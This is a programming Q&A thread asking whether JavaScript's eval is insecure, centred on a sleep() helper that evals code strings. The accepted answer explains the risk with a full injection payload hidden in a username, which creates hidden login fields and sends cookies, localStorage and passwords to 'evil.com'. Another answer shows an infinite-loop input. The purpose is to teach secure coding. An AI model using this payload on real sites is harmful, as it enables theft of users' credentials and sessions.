# JS: Is eval really secure?

Tags: javascript

## Intro:

Is eval really secure? Are there ways that a hacker can execute eval onto the machine server and hack/destory it? How would me and others go about if we wanted a fix or alternative for this?

## Client code:

```
    function sleep(s, action) {
      if(action !== null) {
        if(action.constructor === Array) {
          setTimeout(function(){
          for(i = 0; i < action.length; i++) {
            eval(action[i]);
          }
        }, s);
        } else {
          setTimeout(function(){ eval(action); }, s);
        }
      } else {
        setTimeout(function(){ return true; }, s);
      }
    }

/*Example 1:*/ sleep(1000, ["alert('ok in alert')", "console.log('ok in console')"]);
/*Example 2:*/ sleep(1000, "console.log('one single line of code")
/*Example 3:*/ sleep(1000) //returns true after 1s
```

## Explaination for the code:

The function *sleep()* job is to wait for x seconds and then execute code that the user has inputted. *sleep()* is called with two parameters. One of them is a must *(s)* and the other one is optional *(action)*.

the *(s)* parameters holds the amount of **seconds** for timeouts inside the functions.

the (action) holds **code in string-format** to be executed by the function. If no *(action)* parameter was inputted, the function will return true.

## TL;DR:

Is eval really that insecure that people say? And if so, why? Is there any fix/alternative to similar problem like above.

*NB. tried to make this as simple as possible so it can help both you as a reader and myself.*

Comment: Why pass code as strings? Just pass a list of functions.

Comment: I want the user to be able to input their own code in the sleep() function.

Comment: Are you talking about client side JS or server (node) JS?

Comment: If you want the user to be able to input their own code then not using eval will not protect you from anything.

Comment: ©Ed Heal This is client code.

Comment: @Insanic Who is "the user"? A web developer writing JavaScript and calling your library function, or someone sitting in front of a browser, interacting with your page?

Comment: @Salman A I know, but is there alternatives or ways to prevent attacks such as file upload scripts.

Comment: @melpomene Yes, i am trying to make my own library.

Comment: @melpomene The user is the person using my library.

Comment: Then the user could just do: `setTimeout(function () { alert('ok in alert'); console.log('ok in console'); , 1000);` What's the point of your function?

Answer (score 1, accepted):

Consider the following scenario: You've found this library and put it to use on your website to display a cycling list of recently-active users. Since `sleep` takes a string to evaluate, it's really easy to just grab a username and tack it onto the end of a statement to update the list:

```
var username = getTopUserViaXHRSynchronouslySomehow('/userstats.php');
sleep(10000, 'document.querySelector("#ticker").textContent = "' + username + '"');
```

(You've read that `textContent` is the right property to use for this. It updates the element safely, making sure nothing gets interpreted as HTML which could be used in an attack.)

Now I come along and check out the source code of your site. And I get an [awful](https://i.stack.imgur.com/uk7iz.jpg) idea. I register a new user with the username

```
MustacheTwirler1337";

var userbox = document.createElement('input');
userbox.setAttribute('name', 'login_username');
userbox.style.position = 'absolute';
userbox.style.top = '-200px';

var passbox = document.createElement('input');
passbox.setAttribute('name', 'login_password');
passbox.setAttribute('type', 'password');
passbox.style.position = 'absolute';
passbox.style.top = '-200px';

document.body.append(userbox, passbox);

setTimeout(() => {
  fetch('http://evil.com/', {
    method: 'POST',
    body: JSON.stringify({
      cookie: document.cookie,
      local: window.localStorage,
      username: userbox.value,
      password: passbox.value
    }), 
    headers: new Headers({
      'Content-Type': 'application/json'
    })
  });
}, 500);

var s = "
```

(Of course, I minify all that first. Your site won't let me put line breaks in my username.) Then, I rush around your site, making sure my name ends up getting returned by `userstats.php`.

Now, all your users get my username/nefarious code running in their browsers. Since this is all running from your site, my code has access to the cookie data and local storage associated with your domain. And I've added login input boxes (with the same names as the real ones), which the users' password managers helpfully fill out. And then I tell your users to pass all that juicy data straight on to my server.

You also use your site, and your login has more privileges than the average user. Yours is the account I've been looking for. With your credentials in hand, I destroy your site. (And I keep everybody else's info, just in case they reuse passwords even with a password manager. I can probably ruin at least a few people's online lives.)

---

Now, was this `eval`'s fault? Not directly, but it made writing bad code much easier than writing good code. If `sleep` had taken a function, you wouldn't have gone out of your way to use `eval`. Your code would look like this:

```
var username = getTopUserViaXHRSynchronouslySomehow('/userstats.php');
sleep(10000, function () {document.querySelector("#ticker").textContent = username;});
```

and none of my code would have been able to run.

Answer (score 2):

> Are there ways that a hacker can execute eval onto the machine server and hack/destory it?

If you are writing client-side JavaScript, then no security hole - no matter how big - in that code can result in anything bad happening on the server. Because if it could, then you wouldn't need to abuse holes in client-side JS but would just send malicious request manually

---

To the actual point of your question, `eval` is insecure, because usually it means you are writing awful code if you use it. It takes an arbitrary string of code and runs it - unless you are generating code dynamically, you do not want or need this.

For example, in case of what you posted, you would pass a callback function instead of a string of code to `sleep` or even return a Promise. And this is literally the answer for pretty much all cases where people *think* they need to use `eval` or put code in strings.

---

Here's what your code would look like with callback functions:

```
function sleep(s, action) {
  if(action !== null) {
    if(action.constructor === Array) {
      setTimeout(function(){
        for(i = 0; i < action.length; i++) {
          action[i]();
        }
      }, s);
    } else {
      setTimeout(action, s);
    }
  }
}

/*Example 1:*/ sleep(1000, [function () { alert('ok in alert') }, function () { console.log('ok in console') } ]);
/*Example 2:*/ sleep(1000, function () { console.log('one single line of code') });
/*Example 3:*/ sleep(1000); //Does nothing. What's the point of creating an empty timeout?
```

Comment: This is all correct, but a bit more could be told about the "no impacts on the server".
If they pass arbitrary code as the user would like, you can start AJAX requests to the server using for example the same cookie used by the app (if the auth is performed in this way) and they can hack even the server with this kind of hole

Answer (score 1):

Everything can be insecure if done wrong. The same applies to `eval`. You can say using `eval` is bad practice because of possible security problems and poor performance but e.g. there is nothing insecure in

```
const result = eval('Math.random()');
```

because nobody can change the subject of the execution.

If your users are able to write the JavaScript and pass it as some input, there will be always ways to create problems. Here is what you can get from your user in your particular case:

```
while (true) {}
```

which blocks a thread / a processor core forever and definitely is not what you want regardless of the platform (browser / server / whatsoever).

Comment: Another problem: `sleep(1000, "console.log('one single line of code")` is actually wrong (missing `'` in the inner string), but you won't notice until you try to `eval` it. Without `eval` you get a syntax error straight away and in the right location (where the code actually is, not at the `eval` that lives in a different file 1000 lines away).

Comment: @melpomene you are right, but this is not a security issue while e.g. `while(true) {}` freezes your server and that is or at least very close to be a security issue

Comment: If you run it in nodejs it does

Comment: @quirimmo how does the architecture matter here? The question is about eval. If you call `eval('while(true) {}')` on nodejs it blocks the server's thread. Dot.